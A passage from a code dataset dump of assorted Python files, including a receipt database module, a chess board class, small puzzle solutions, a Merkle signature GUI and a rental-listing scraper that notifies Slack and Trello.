Send it to the production environment instead.''',\n # Custom status code\n '30000': 'bundle id not match.',\n '30001': 'production id not match',\n}\n\n\n@sql_wrapper\ndef save_receipt(user_id, pay_id,receipt_data, result_info):\n iap_receipt = IAPReceipt()\n in_app = result_info['receipt']['in_app'][0]\n transaction_id = in_app['transaction_id']\n product_id = in_app['product_id']\n env = result_info.get(\"environment\", \"production\")\n iap_receipt.id = transaction_id\n iap_receipt.user_id = user_id\n iap_receipt.pay_id = pay_id\n iap_receipt.receipt = receipt_data\n iap_receipt.receipt_info = str(result_info)\n iap_receipt.product_id = product_id\n iap_receipt.environment = env\n iap_receipt.provide_status = 0\n iap_receipt.updated_at = datetime.utcnow()\n iap_receipt.save()\n\n\n@sql_wrapper\ndef save_invalid_receipt(hash_text, receipt_data, status_code):\n iap_invalid_receipt = IAPInvalidReceipt()\n iap_invalid_receipt.id = hash_text\n iap_invalid_receipt.receipt = receipt_data\n iap_invalid_receipt.status = status_code\n iap_invalid_receipt.extend = STATUS_CODE_DESCRIPTION.get(str(status_code), 'Other reasons')\n iap_invalid_receipt.updated_at = datetime.utcnow()\n iap_invalid_receipt.save()\n\n\n@sql_wrapper\ndef update_receipt_provide_success(transaction_id):\n res = IAPReceipt.query.filter(IAPReceipt.id == transaction_id).filter(IAPReceipt.provide_status == 0).update(\n {\n 'provide_status': 1,\n 'updated_at': datetime.utcnow()\n }\n )\n if res:\n orm.session.commit()\n return True\n else:\n res = IAPReceipt.query.filter(IAPReceipt.id == transaction_id).filter(IAPReceipt.provide_status == 2).update(\n {\n 'provide_status': 1,\n 'updated_at': datetime.utcnow()\n }\n )\n if res:\n orm.session.commit()\n return True\n else:\n return False\n\n\n@sql_wrapper\ndef update_receipt_provide_fail(transaction_id):\n res = IAPReceipt.query.filter(IAPReceipt.id == transaction_id).filter(IAPReceipt.provide_status == 0).update(\n {\n 'provide_status': 2,\n 'updated_at': datetime.utcnow()\n }\n )\n if res:\n orm.session.commit()\n return True\n else:\n return False\n\n\n\n\n\n\n","sub_path":"luckycommon/db/iap_receipt.py","file_name":"iap_receipt.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"200084704","text":"import sys\r\nfrom PIL.ImageQt import ImageQt\r\nfrom PIL import Image\r\nfrom PyQt5.QtGui import QPixmap\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtWidgets import QLabel, QApplication, QWidget, QScrollArea, QGridLayout\r\n\r\nfrom a3d_class import *\r\n\r\n\r\nclass Window(QScrollArea):\r\n def __init__(self, filenames):\r\n super(Window, self).__init__()\r\n self.row = 0\r\n widget = QWidget()\r\n self.layout = QGridLayout(widget)\r\n self.layout.setAlignment(Qt.AlignTop)\r\n self.populate(filenames)\r\n self.setWidget(widget)\r\n self.setWidgetResizable(True)\r\n self.show()\r\n\r\n def append_row(self, name, value):\r\n label1 = QLabel(name)\r\n self.layout.addWidget(label1, self.row, 0)\r\n if type(value) == str:\r\n label2 = QLabel(value)\r\n self.layout.addWidget(label2, self.row, 1)\r\n elif type(value) == Image.Image:\r\n label2 = QLabel(\"\")\r\n image_qt = ImageQt(value)\r\n pixmap = QPixmap.fromImage(image_qt)\r\n pixmap.detach()\r\n # https://stackoverflow.com/questions/35204123/python-pyqt-pixmap-update-crashes\r\n label2.setPixmap(pixmap)\r\n self.layout.addWidget(label2, self.row, 1)\r\n else:\r\n raise ValueError()\r\n self.row += 1\r\n\r\n def populate(self, 
filenames):\r\n pages = []\r\n for filename in filenames:\r\n print('loading: %s' % filename)\r\n page = ScenarioPage.open(filename)\r\n pages.append(page)\r\n\r\n print('processing...')\r\n scenario = Scenario.frompages(*pages)\r\n\r\n author = str(scenario.body.author)\r\n title = str(scenario.header.title)\r\n filename = f\"{author}_{title}.dat\"\r\n with open(filename, mode=\"wb\") as f:\r\n f.write(scenario.body)\r\n\r\n self.append_row(\"作者名\", str(scenario.body.author))\r\n self.append_row(\"シナリオ名\", str(scenario.header.title))\r\n self.append_row(\"シナリオ説明文\", str(scenario.header.description))\r\n\r\n # height map\r\n height_map_im = scenario.body.height_map.to_image()\r\n self.append_row(\"Height map\", height_map_im)\r\n\r\n # building?\r\n building_map_im = scenario.body.building_map.to_image()\r\n self.append_row(\"Building map?\", building_map_im)\r\n\r\n # layers?\r\n for i in range(len(scenario.body.layers)):\r\n name = \"Layer \" + str(i).zfill(2)\r\n layer_im = scenario.body.layers[i].to_image()\r\n self.append_row(name, layer_im)\r\n\r\n # area name\r\n for i in range(len(scenario.body.areas)):\r\n name = \"地名 \" + str(i).zfill(2)\r\n area = scenario.body.areas[i]\r\n self.append_row(name, str(area.name))\r\n\r\n # scene\r\n for i in range(40):\r\n for j in range(50):\r\n mes_struct = scenario.body.messages[i][j]\r\n data = mes_struct.data\r\n if len(data) > 0 and data[0] != ord('%'):\r\n mes = str(mes_struct)\r\n self.append_row(\"シーン %02d, %02d\" % (i+1, j), mes)\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n main = Window(sys.argv[1:])\r\n sys.exit(app.exec_())\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"236535828","text":"import asyncio\nimport click\n\n@click.group(\"lw\", short_help=\"Light Wallet\")\ndef lw_cmd():\n \"\"\"Accounting functions without synching the wallet\"\"\"\n\n@lw_cmd.command(\"show\", short_help=\"Show the summary wallet balances for all configured keys. 
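The group/subcommand wiring used in this record follows the stock click pattern of a group plus a command that drives an asyncio loop; a hedged, minimal sketch with hypothetical names (demo_cmd, ping_cmd):

import asyncio
import click

@click.group("demo")
def demo_cmd():
    """A tiny command group."""

@demo_cmd.command("ping", short_help="Print pong a few times.")
@click.option("--count", default=1, show_default=True, type=int)
def ping_cmd(count: int):
    async def run():
        for _ in range(count):
            print("pong")
    # Mirror the run_until_complete/close pattern used in the record.
    loop = asyncio.get_event_loop()
    try:
        loop.run_until_complete(run())
    finally:
        loop.close()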
Good luck approach for first 500 puzzle hashes.\")\n@click.option(\n \"--puzzle-search\",\n \"-p\",\n default=500,\n help=\"Enter the amount of puzzle hashes to search for.\",\n type=int,\n required=True,\n)\n@click.option(\n \"--show-csv\",\n help=\"Show all transactions for all configured keys.\",\n default=False,\n show_default=True,\n is_flag=True\n)\n@click.pass_context\ndef show_cmd(ctx: click.Context, puzzle_search: int, show_csv: bool):\n from .lw_funcs import show_balance_summary, show_csv_export\n from pathlib import Path\n\n root_path: Path = ctx.obj[\"root_path\"]\n\n loop = asyncio.get_event_loop()\n try:\n if show_csv:\n loop.run_until_complete(show_csv_export(root_path, puzzle_search))\n else:\n loop.run_until_complete(show_balance_summary(root_path, puzzle_search))\n finally:\n loop.close()\n\n","sub_path":"chia/cmds/lw.py","file_name":"lw.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"603556701","text":"#-*- coding: utf-8 -*-\nfrom typing import List\nimport math\n\nimport time\ndef timeit(func):\n def wrapped(*args, **kwargs):\n start = time.time()\n ret = func(*args, **kwargs)\n elapsed = time.time() - start\n print(\"elapsed: %s\" % elapsed)\n return ret\n return wrapped\n\nclass Solution:\n # @param n, an integer\n # @return an integer\n def reverseBits(self, n):\n x = n\n ans = 0\n for i in range(32):\n ans |= ((x & 1) << (31 - i))\n x >>= 1\n return ans\n\n\n\n\nsamples = [\n # 1958pm start\n (43261596, 964176192),\n (4294967293, 3221225471),\n]\n\n# for s, t, expected in samples:\n# ans = Solution().isAnagram(s, t)\n# print(ans)\n\nfor S, expected in samples:\n ans = Solution().reverseBits(S)\n print(ans)\n","sub_path":"lc/esy/20190923_esy_190_reverse_bits.py","file_name":"20190923_esy_190_reverse_bits.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"604768480","text":"from metaknight.piece import PieceType, Piece, Color\nfrom metaknight.square import Square\nfrom typing import List\n\n\nclass Board:\n def __init__(self):\n self.squares: List[List[Square]] = [[Square(file + rank) for file in Square.files] for rank in Square.ranks]\n self.set_up()\n\n def __repr__(self):\n return self.board_as_str(Color.WHITE)\n\n def board_as_str(self, perspective: Color):\n \"\"\"\n Prints the current state of the board\n :param perspective: prints from either white's perspective or black's perspective\n :return: string representation of the current board state\n \"\"\"\n output = ''\n if perspective is Color.WHITE:\n for rank in range(7, -1, -1):\n for file in range(0, 8):\n piece = self.squares[rank][file].piece\n if piece:\n output += f'{repr(piece)} '\n else:\n output += '. '\n output += '\\n'\n if perspective is Color.BLACK:\n for rank in range(0, 8):\n for file in range(7, -1, -1):\n piece = self.squares[rank][file].piece\n if piece:\n output += f'{repr(piece)} '\n else:\n output += '. 
'\n output += '\\n'\n return output[:-1] # This removes the last \\n character\n\n def clear(self):\n \"\"\" This method will only be used for debugging purposes\n \"\"\"\n self.squares = [[Square(file + rank) for file in Square.files] for rank in Square.ranks]\n\n def set_board_state(self, board_state: List[str]):\n \"\"\"\n Sets self.squares to the format given by board_state\n :param board_state: the pieces on each square\n \"\"\"\n self.clear()\n for i in range(0, 8):\n for j in range(0, 8):\n piece = board_state[i][j]\n if piece == '.':\n piece = None\n elif piece == 'p':\n piece = Piece(PieceType.PAWN, Color.WHITE)\n elif piece == 'n':\n piece = Piece(PieceType.KNIGHT, Color.WHITE)\n elif piece == 'b':\n piece = Piece(PieceType.BISHOP, Color.WHITE)\n elif piece == 'r':\n piece = Piece(PieceType.ROOK, Color.WHITE)\n elif piece == 'q':\n piece = Piece(PieceType.QUEEN, Color.WHITE)\n elif piece == 'k':\n piece = Piece(PieceType.KING, Color.WHITE)\n elif piece == 'P':\n piece = Piece(PieceType.PAWN, Color.BLACK)\n elif piece == 'N':\n piece = Piece(PieceType.KNIGHT, Color.BLACK)\n elif piece == 'B':\n piece = Piece(PieceType.BISHOP, Color.BLACK)\n elif piece == 'R':\n piece = Piece(PieceType.ROOK, Color.BLACK)\n elif piece == 'Q':\n piece = Piece(PieceType.QUEEN, Color.BLACK)\n elif piece == 'K':\n piece = Piece(PieceType.KING, Color.BLACK)\n self.squares[7-i][j].piece = piece\n\n def set_up(self):\n # Pawns\n for i in range(8):\n self.squares[1][i].piece = Piece(PieceType.PAWN, Color.WHITE)\n self.squares[6][i].piece = Piece(PieceType.PAWN, Color.BLACK)\n\n # Rooks\n for i in (0, 7):\n self.squares[0][i].piece = Piece(PieceType.ROOK, Color.WHITE)\n self.squares[7][i].piece = Piece(PieceType.ROOK, Color.BLACK)\n\n # Knights\n for i in (1, 6):\n self.squares[0][i].piece = Piece(PieceType.KNIGHT, Color.WHITE)\n self.squares[7][i].piece = Piece(PieceType.KNIGHT, Color.BLACK)\n\n # Bishops\n for i in (2, 5):\n self.squares[0][i].piece = Piece(PieceType.BISHOP, Color.WHITE)\n self.squares[7][i].piece = Piece(PieceType.BISHOP, Color.BLACK)\n\n # Kings and queens\n self.squares[0][3].piece = Piece(PieceType.QUEEN, Color.WHITE)\n self.squares[0][4].piece = Piece(PieceType.KING, Color.WHITE)\n self.squares[7][3].piece = Piece(PieceType.QUEEN, Color.BLACK)\n self.squares[7][4].piece = Piece(PieceType.KING, Color.BLACK)\n\n def get_square(self, location=None, square=None) -> Square:\n \"\"\"\n :param location: string coordinates of a square. 
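The lookup arithmetic here is two index() calls over the class's file and rank strings; a hedged, standalone sketch (to_indices is a hypothetical mirror of this logic, not part of the class):

FILES = "abcdefgh"
RANKS = "12345678"

def to_indices(location: str):
    # 'a3' maps to rank index 2 and file index 0, both zero-based.
    return RANKS.index(location[1]), FILES.index(location[0])

assert to_indices("a3") == (2, 0)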
For example: 'a3' or 'c8'\n :param square: a square object that is not located in this board\n :return: the square at location in this board\n \"\"\"\n if location == '00' or square == Square('00'):\n return Square('00')\n\n if location:\n file = Square.files.index(location[0])\n rank = Square.ranks.index(location[1])\n elif square:\n file = Square.files.index(square.file)\n rank = Square.ranks.index(square.rank)\n else:\n raise ValueError('Must enter either a string location, or a Square object')\n return self.squares[rank][file]\n\n def get_moves(self, location=None, square=None) -> List[List[Square]]:\n square = self.get_square(location=location, square=square)\n if square.piece.piece_type is PieceType.PAWN:\n return self._pawn_moves(square=square)\n elif square.piece.piece_type is PieceType.KNIGHT:\n return self._knight_moves(square=square)\n elif square.piece.piece_type is PieceType.BISHOP:\n return self._bishop_moves(square=square)\n elif square.piece.piece_type is PieceType.ROOK:\n return self._rook_moves(square=square)\n elif square.piece.piece_type is PieceType.QUEEN:\n return self._queen_moves(square=square)\n elif square.piece.piece_type is PieceType.KING:\n return self._king_moves(square=square)\n\n def _pawn_moves(self, square: Square) -> List[List[Square]]:\n moves = []\n square = self.get_square(square=square)\n color = square.piece.color\n forward = Square.up\n rank = '2'\n if square.piece.color is Color.BLACK:\n forward = Square.down\n rank = '7'\n\n forward_square = self.get_square(square=forward(square))\n if forward_square.piece is None:\n moves.append([forward_square])\n forward_square = self.get_square(square=forward(forward_square))\n if square.rank == rank and forward_square.piece is None:\n moves[0].append(forward_square)\n if square.file != 'a':\n diagonal = self.get_square(square=forward(square).left())\n if diagonal.piece and diagonal.piece.color is not color:\n moves.append([diagonal])\n if square.file != 'h':\n diagonal = self.get_square(square=forward(square).right())\n if diagonal.piece and diagonal.piece.color is not color:\n moves.append([diagonal])\n return moves\n\n def _knight_moves(self, square: Square) -> List[List[Square]]:\n original = self.get_square(square=square)\n color = original.piece.color\n moves = [\n self.get_square(square=original.up().up().left()),\n self.get_square(square=original.up().up().right()),\n self.get_square(square=original.down().down().left()),\n self.get_square(square=original.down().down().right()),\n self.get_square(square=original.left().left().up()),\n self.get_square(square=original.left().left().down()),\n self.get_square(square=original.right().right().up()),\n self.get_square(square=original.right().right().down())\n ]\n possible_moves = []\n for move in moves:\n if move != Square('00') and (not move.piece or move.piece.color is not color):\n possible_moves.append([move])\n return possible_moves\n\n def _bishop_moves(self, square: Square) -> List[List[Square]]:\n moves = []\n original = self.get_square(square=square)\n color = original.piece.color\n for func1 in (Square.up, Square.down):\n for func2 in (Square.left, Square.right):\n diagonal = []\n square = original\n while True:\n square = self.get_square(square=func2(func1(square)))\n if square == Square('00'):\n break\n if not square.piece and square != Square('00'):\n diagonal.append(square)\n elif square.piece.color is not color:\n diagonal.append(square)\n break\n else:\n break\n if len(diagonal) >= 1:\n moves.append(diagonal.copy())\n return moves\n\n def 
_rook_moves(self, square: Square) -> List[List[Square]]:\n moves = []\n original = self.get_square(square=square)\n color = original.piece.color\n for func in (Square.up, Square.down, Square.left, Square.right):\n line = []\n square = original\n while True:\n square = self.get_square(square=func(square))\n if square == Square('00'):\n break\n if not square.piece and square != Square('00'):\n line.append(square)\n elif square.piece.color is not color:\n line.append(square)\n break\n else:\n break\n if len(line) >= 1:\n moves.append(line.copy())\n return moves\n\n def _queen_moves(self, square: Square) -> List[List[Square]]:\n return self._rook_moves(square) + self._bishop_moves(square)\n\n def _king_moves(self, square: Square) -> List[List[Square]]:\n original = self.get_square(square=square)\n color = original.piece.color\n moves = [\n self.get_square(square=original.up().left()),\n self.get_square(square=original.up()),\n self.get_square(square=original.up().right()),\n self.get_square(square=original.right()),\n self.get_square(square=original.right().down()),\n self.get_square(square=original.down()),\n self.get_square(square=original.down().left()),\n self.get_square(square=original.left())\n ]\n possible_moves = []\n for move in moves:\n if move != Square('00') and (not move.piece or move.piece.color is not color):\n possible_moves.append([move])\n return possible_moves\n\n def in_check(self, color: Color) -> bool:\n \"\"\"\n Checks if the king of the specified color is in check\n :param color: the color of the king under inspection\n :return: true if the king is in check, of the specified color\n \"\"\"\n king_location: Square = None\n for row in self.squares:\n for square in row:\n if square.piece == Piece(PieceType.KING, color):\n king_location = square\n break\n\n for row in self.squares:\n for square in row:\n if square.piece and square.piece.color != color:\n # The piece on this square is of the opposite color, and could possible pose a check\n moves = self.get_moves(square=square)\n for direction in moves:\n for move in direction:\n if move == king_location:\n return True\n return False\n\n def evaluate(self) -> float:\n \"\"\"\n returns index representing what player is doing better. 
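Counting material reduces to summing standard piece values with a sign per side; a hedged sketch over the same rank-string convention set_board_state uses (lowercase for white, uppercase for black), with material_index as a hypothetical name:

PIECE_VALUES = {"p": 1, "n": 3, "b": 3, "r": 5, "q": 9}

def material_index(board_state):
    # board_state: eight rank strings, lowercase = white, uppercase = black, '.' = empty.
    score = 0.0
    for rank in board_state:
        for ch in rank:
            value = PIECE_VALUES.get(ch.lower(), 0)
            score += value if ch.islower() else -value
    return score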
Negative number for black and positive for white\n 1 point indicates a pawn, so if evaluate() returns -2, black is 2 pawns ahead\n certain tactics will be used in this function, for example pins and doubled pawns\n \"\"\"\n # TODO: finish\n return self.evaluate_by_material()\n\n def evaluate_by_material(self) -> float:\n \"\"\"\n returns index representing what player is ahead in material using the standard value for pieces\n \"\"\"\n index: float = 0\n for row in self.squares:\n for square in row:\n if square.piece:\n color = 1 if square.piece.color is Color.WHITE else -1\n if square.piece.piece_type == PieceType.PAWN:\n index += color * 1\n elif square.piece.piece_type == PieceType.KNIGHT:\n index += color * 3\n elif square.piece.piece_type == PieceType.BISHOP:\n index += color * 3\n elif square.piece.piece_type == PieceType.ROOK:\n index += color * 5\n elif square.piece.piece_type == PieceType.QUEEN:\n index += color * 9\n return index\n\n\n","sub_path":"metaknight/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":13084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"220222032","text":"\"\"\"\n> Understanding the question..\nWe are trying to find continuous sub segments.\nminimum number of zeroes to erase to make it continuous sub-segments\n\"\"\"\n\nfrom collections import deque\n\ndef count_minimum(strs):\n if strs.count('1') == 0:\n return 0\n\n idx = strs.find('1')\n ns = strs[idx:]\n q = deque(ns)\n cnt = 0\n\n while q:\n ch = q.popleft()\n if ch == '0' and q.count('1') > 0:\n cnt += 1\n return cnt\n\n\nif __name__ == '__main__':\n t = int(input())\n while t:\n string = input()\n result = count_minimum(string)\n print(result)\n t -= 1","sub_path":"contests/1303A-Erazing-Zeroes.py","file_name":"1303A-Erazing-Zeroes.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"619757678","text":"from collections import abc, namedtuple\n\n\nclass _Type:\n fields = tuple()\n\n def __init__(self, **kwargs):\n for f in self.fields:\n if type(f) is str:\n setattr(self, f, kwargs.get(f, None))\n elif type(f) is tuple:\n setattr(self, f[1], kwargs.get(f[0], None))\n\n\nclass Response(_Type):\n fields = (\"status\", \"version\")\n\n def __init__(self, data, **kwargs):\n self.data = data\n\n for f in self.fields:\n setattr(self, f, kwargs.get(f, None))\n\n def pretty(self):\n return self.status\n\n\nclass MusicFolders(list):\n def pretty(self):\n print(\"\\n\".join([f\"{e.id}\\t{e.name}\" for e in self]))\n\n\nclass Album(_Type):\n fields = (\n \"id\",\n \"name\",\n \"artist\",\n \"artistId\",\n \"coverArt\",\n \"created\",\n \"duration\",\n \"songCount\",\n (\"song\", \"tracks\"),\n )\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def pretty(self):\n s = f\"\"\"Name: {self.name}\nID: {self.id}\n\nTracks\n\"\"\"\n return s + \"\\n\".join([t.pretty() for t in self.tracks])\n\n\nclass Artist(_Type):\n fields = (\"id\", \"name\", (\"album\", \"albums\"))\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def pretty(self):\n s = f\"\"\"Name: {self.name}\nID: {self.id}\n\nAlbums\n\"\"\"\n return s + \"\\n\".join([a.pretty() for a in self.albums])\n\n\nclass ArtistAlbum(_Type):\n fields = (\n \"id\",\n \"name\",\n \"artist\",\n \"artistId\",\n \"coverArt\",\n \"created\",\n \"duration\",\n \"songCount\",\n )\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def pretty(self):\n return 
f\"{self.id}\\t{self.name}\\t{self.artist}\\t{self.created}\"\n\n\nclass Genres(list):\n def pretty(self):\n return \"\\n\".join(self)\n\n\nclass Indexes(list):\n def pretty(self):\n return \"\\n\".join(\n [f\"{i.name}\\t{a.id}\\t{a.name}\" for i in self for a in i.artists]\n )\n\n\nclass MusicDirectory(_Type):\n fields = (\"id\", \"name\", \"parent\", (\"child\", \"children\"))\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def pretty(self):\n s = f\"\"\"Name: {self.name}\nID: {self.id}\nParent ID: {self.parent}\n\nContents\n\"\"\"\n\n return s + \"\\n\".join([c.pretty() for c in self.children])\n\n\nclass Child(_Type):\n fields = (\"id\", \"title\", \"parent\", \"isDir\", \"isVideo\", \"album\", \"artist\", \"created\")\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n\nclass Subdirectory(Child):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def pretty(self):\n return f\"Subdir\\t{self.id}\\t{self.title}\\t{self.parent}\\t{self.album}\\t{self.artist}\\t{self.created}\"\n\n\nclass Track(Child):\n fields = (\n \"album\",\n \"albumId\",\n \"artist\",\n \"artistId\",\n \"bitRate\",\n \"contentType\",\n \"coverArt\",\n \"created\",\n \"discNumber\",\n \"duration\",\n \"genre\",\n \"id\",\n \"isDir\",\n \"isVideo\",\n \"parent\",\n \"path\",\n \"size\",\n \"suffix\",\n \"title\",\n \"track\",\n \"type\",\n \"year\",\n )\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def pretty(self):\n return f\"Track\\t{self.id}\\t{self.title}\\t{self.parent}\\t{self.album}\\t{self.artist}\\t{self.created}\"\n\n\nIdName = namedtuple(\"IdName\", (\"id\", \"name\"))\nIndex = namedtuple(\"Index\", (\"name\", \"artists\"))\n","sub_path":"subsonic_client/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"348183501","text":"#\n# example of an acceptance test for a command-line app\n#\n\nimport os\n\nPROGRAM = '../mobydick/word_counter.py'\nTEXT_FILE = '../test_data/mobydick_summary.txt'\nOUTPUT = 'out.tmp'\n\nclass TestWordCounterAcceptanceTests:\n\n def test_commandline(self):\n \"\"\"Count words in a short text\"\"\"\n # remove output file if it is already there\n if os.path.exists(OUTPUT):\n os.remove(OUTPUT)\n\n # run the command line app\n cmd = 'python %s %s white > %s' % (PROGRAM, TEXT_FILE, OUTPUT)\n os.system(cmd)\n \n # check the output\n out = open(OUTPUT).read()\n self.assertTrue('white:\\t2' in out)\n\n","sub_path":"test/test_acceptance.py","file_name":"test_acceptance.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"488712257","text":"import sys\nimport hashlib\nimport base64\nimport json\n\nfrom PyQt4.QtGui import *\n\nimport merkle\nimport hbss_utilities\n\n\nclass QuantumSignatureGUI(QMainWindow):\n width = 380\n height = 200\n \n def __init__(self, parent=None):\n super(QuantumSignatureGUI, self).__init__(parent)\n self.init_ui()\n\n def init_ui(self):\n self.setFixedSize(self.width, self.height)\n self.setWindowTitle(\"Quantum Subscriber\")\n\n # Sign label\n userLabel = QLabel(self)\n userLabel.move(20, 15)\n userLabel.setText('File to SIGN:')\n # Sign textbox\n self.fileTextbox = QLineEdit(self)\n self.fileTextbox.move(20, 45)\n self.fileTextbox.resize(self.width - 40, 20)\n # Browse button\n buttonBrowse = QPushButton('Browse', self)\n buttonBrowse.move(20, 100)\n 
buttonBrowse.clicked.connect(self.browse_click)\n # Sign button\n buttonSign = QPushButton('Sign', self)\n buttonSign.move(260, 100)\n buttonSign.clicked.connect(self.sign_click)\n\n def browse_click(self):\n filename = QFileDialog.getOpenFileName(self, 'Open File', '/')\n self.fileTextbox.setText(filename)\n\n def sign_click(self):\n fname = self.fileTextbox.text()\n\n hashFromFile = hbss_utilities.calculate_hash_from_file(open(fname, 'rb'),\n hashlib.sha512())\n\n mytree = merkle.MerkleTree(4)\n publicKey = str(base64.b64encode(mytree.tree_public_key()),'utf-8')\n dictofPK = {}\n dictofPK[\"public_key: \"] = publicKey\n\n mysig = mytree._sign_message(hashFromFile)\n mysig.update(dictofPK)\n\n with open(\"signature.sig\",mode='w') as SigOut:\n SigOut.write(json.dumps(mysig, indent=2))\n\n finalMessage = QMessageBox(self)\n finalMessage.information(self,\n \"Message\",\n \"File was signed and signature was saved into \\\"signature.sig\\\"\")\n # print(\"Sprava bola podpisana\")\n\n\ndef main():\n app = QApplication(sys.argv)\n myApp = QuantumSignatureGUI()\n myApp.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"hbss.pyw","file_name":"hbss.pyw","file_ext":"pyw","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"191744260","text":"#!/usr/bin/python3\n\nimport argparse\nimport urllib.request\nimport json\nimport datetime\nimport requests\nfrom time import sleep\n\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlencode\nfrom collections import OrderedDict\nfrom get_url import parse_property_page, parse_property_page_sr, property_filepath, property_filepath_sr\nfrom slackclient import SlackClient\nimport trolly\n\nimport re\n\n\ndef mdlinks(text):\n return re.sub(r'\\<(.+?)\\|(.+?)\\>', r'[\\2](\\1)', text)\n\n\ndef create_card(title, description):\n description = mdlinks(description)\n description = description.replace(\"*\", \"**\")\n c2 = l2.add_card({'name': title, \"desc\": description})\n\n\nimport os\n\nwith open(os.path.join(os.path.dirname(os.path.realpath(__file__)),\n \"config.json\")) as f:\n config = json.load(f)\n sc_token = config[\"slack_token\"]\n tr_token = config[\"trello_token\"]\n tr_key = config[\"trello_key\"]\n tr_board = config[\"trello_board\"]\n work_addr1 = config[\"work_addr1\"]\n work_addr2 = config[\"work_addr2\"]\n radius = config.get(\"radius\", 20)\n areas = [work_addr1, work_addr2]\n # searchid1 = config[\"sr_searchid1\"]\n # searchid2 = config.get(\"sr_searchid2\", None)\n # searchids = [searchid1, searchid2]\n max_value = config.get(\"max_value\", 1500)\n min_value = config.get(\"min_value\", 1000)\n avail_from = config.get(\"avail_from\", datetime.datetime.today())\n avail_from = datetime.datetime.strptime(avail_from, \"%Y-%m-%d\") if not isinstance(avail_from, datetime.datetime) else avail_from\n delta = datetime.timedelta(days=config.get(\"delta_days\", 30))\n\nsc = SlackClient(sc_token)\n\nclient = trolly.client.Client(tr_key, tr_token)\nb2 = client.get_board(tr_board) # househunting\nb2.update_board()\nl2 = [_ for _ in b2.get_lists()][0] # first list on the left\nl2.update_list()\n\n\ndef directions_link(prop):\n def maps_link(start_addr, end_addr):\n query_string = urlencode(\n OrderedDict(f=\"d\",\n saddr=start_addr,\n daddr=end_addr,\n dirflg=\"r\"))\n\n return \"http://maps.google.co.uk/?%s\" % query_string\n\n if 'latlong' in prop:\n start_addr = prop[\"latlong\"]\n else:\n start_addr = 
\",\".join(prop['title'].split(\",\")[1:])\n\n return \"*Directions* 1: <{}|to {}> and 2: <{}|to {}>\".format(\n maps_link(start_addr, work_addr1), work_addr1,\n maps_link(start_addr, work_addr2), work_addr2)\n\n\ndef links_filepath():\n outdir = os.path.dirname(os.path.realpath(__file__))\n return os.path.join(outdir, 'links.json')\n\n\ndef should_notify(prop):\n price = prop['price']\n title = prop['title']\n desc = prop['description']\n epc = prop['EPC']\n try:\n av = datetime.datetime.strptime(prop['available_from'], '%Y-%m-%d')\n except ValueError:\n av = datetime.datetime.today()\n\n if price > max_value:\n return False, \"too expensive: {} > {}\".format(price, max_value)\n if price < min_value:\n return False, \"too cheap: {} < {}\".format(price, min_value)\n\n if \"Note: This OpenRent Property Is No Longer Available For Rent\" in desc:\n return False, \"already let\"\n\n # if \"studio\" in desc.lower():\n # return False, \"studio\"\n\n # if \"studio\" in title.lower():\n # return False, \"studio\"\n\n if \"shared flat\" in desc.lower():\n return False, \"shared flat\"\n\n if \"shared flat\" in title.lower():\n return False, \"shared flat\"\n\n if epc and (epc.upper() in list(\"EFG\")):\n return False, \"EPC is too low: {}\".format(epc.upper())\n\n if av < avail_from:\n return False, \"Available date ({:%Y-%m-%d}) is too early\".format(av)\n if av > avail_from + delta:\n return False, \"Available date ({:%Y-%m-%d}) is too late\".format(av)\n\n return True, \"\"\n\n\ndef notify(property_id):\n print(\"Notifying about %s...\" % property_id)\n\n def make_link(property_id):\n return (\"https://www.openrent.co.uk/%s\" % property_id)\n\n sc.api_call(\"api.test\")\n sc.api_call(\"channels.info\", channel=\"1234567890\")\n\n with open(property_filepath(property_id)) as f:\n prop = json.load(f)\n\n should_notify_, reason = should_notify(prop)\n if not should_notify_:\n print(\"Skipping notification: %s...\" % reason)\n return\n\n if not len(prop['location']) > 0:\n prop['location'].append(['unknown'] * 2)\n text = (\"<{link}|{title}> close to {location} ({walk_duration}):\\n\"\n \"*Price:* {price}. *Available from:* {av}. *EPC:* {epc}. {has_garden}\\n\"\n \"{directions}.\\n*Description:*\\n{desc}\").format(\n location=prop['location'][0][0],\n walk_duration=prop['location'][0][1],\n link=make_link(property_id),\n price=prop['price'],\n desc=prop['description'][:1000],\n av=prop['available_from'],\n title=prop['title'],\n epc=prop['EPC'],\n directions=directions_link(prop),\n has_garden=\"With garden. 
